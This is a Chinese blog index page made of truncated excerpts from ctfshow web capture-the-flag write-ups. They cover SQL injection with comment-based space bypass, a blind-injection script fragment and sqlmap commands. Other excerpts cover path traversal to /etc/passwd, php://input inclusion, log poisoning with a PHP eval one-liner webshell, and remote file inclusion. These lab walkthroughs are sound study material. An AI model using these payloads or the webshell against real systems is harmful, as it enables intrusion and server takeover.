首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
ctfshow—web—web6
】的更多相关文章
ctfshow—web—web6
打开靶机 发现登录窗,首先想到SQL注入 抓包,进行SQL注入测试 测试发现空格符被过滤了 使用/**/代替空格符进行绕过,绕过后登录成功 检测回显位 开始查询数据库名 开始查询数据库内数据表名称 查询表内字段名 查询字段信息 成功拿到flag…
ctfshow WEB入门 信息收集 1-20
web1 题目:开发注释未及时删除 查看页面源代码即可 web2 题目:js把鼠标右键和f12屏蔽了 方法一: 禁用JavaScript 方法二: url前面加上view-source: web3 题目:抓个包试试 抓包在请求包发现flag web4 题目:总有人把后台地址写入robots 访问robots.txt后得到后台地址,访问得到flag web5 题目:phps源码泄露 访问index.phps下载源码拿到flag web6 题目:解压源码到当前目录,测试正常,收工 访问www.zip…
ctfshow—web—web7
打开靶机 发现是SQL注入,盲注 过滤了空格符,可以用/**/绕过,抓包 直接上脚本 import requestss=requests.session()url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'table=""for i in range(1,45): print(i) for j in range(31,128): #爆表名 flag payload = "asc…
ctfshow—web—web5
打开靶机,代码审计 附上代码 <?php error_reporting(0); ?> <html lang="zh-CN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=devic…
ctfshow—web—web4
打开靶机 发现与web3很相似,测试文件包含未成功 此题有两种解决方法 一.日志注入 查看日志的默认目录,得到了日志文件 ?url=/var/log/nginx/access.log 进行日志注入 <?php @eval($_POST['a']);?> 这里需要把一句话木马加在参数里面 用蚁剑进行连接测试 连接成功,在www目录下发现flag.txt文件 查看flag.txt文件内容 成功拿到flag 二.远程文件包含 重新开启一个靶机环境 在购买的阿里云服务器中编写一句话木马(阿里云服务器已…
ctfshow—web—web3
打开靶机 提示是文件包含漏洞 测试成功 https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd 此题考的是PHP伪协议+文件包含,实现任意命令执行 抓取数据包 https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input 开始试验,查询当前目录下的文件…
ctfshow—web—web2
打开靶机,根据提示是SQL注入 打开后看到登录窗口 方法一.手工注入 抓取数据包 开始SQL注入测试 利用万能密码,登录成功 查看回显位置 查询数据库 查询数据库内数据表 如果想整齐一点显示可以添加group_concat() 查询字段 查询字段内容 成功拿到flag 方法二.sqlmap注入 把之前抓取的数据复制到sqlmap根目录下test.txt内 保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlma…
ctfshow—web—web签到题
打开靶机,发现只有一句话 查看源码 发现一段字符串,猜是base64加密 拿到flag…
web安全之快速反弹 POST 请求
在 CTF Web 的基础题中,经常出现一类题型:在 HTTP 响应头获取了一段有效期很短的 key 值后,需要将经过处理后的 key 值快速 POST 给服务器,若 key 值还在有效期内,则服务器返回最终的 flag,否则继续提示"请再加快速度!!!" 如果还执着于手动地获取 key 值,复制下来对其进行处理,最后用相应的工具把 key 值 POST 给服务器,那么对不起,因为 key 值的有效期一般都在 1 秒左右,除非有单身一百年的手速,否则不要轻易尝试.显然,这类题不是通过纯…
无字母数字getshell
无字母数字webshell 预备知识 一些不包含数字和字母的webshell https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 无字母数字webshell之提高篇 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html 第一篇文章主要介绍通过取反.异或.递增,p神讲的很清楚了. 题目 <?php if(is…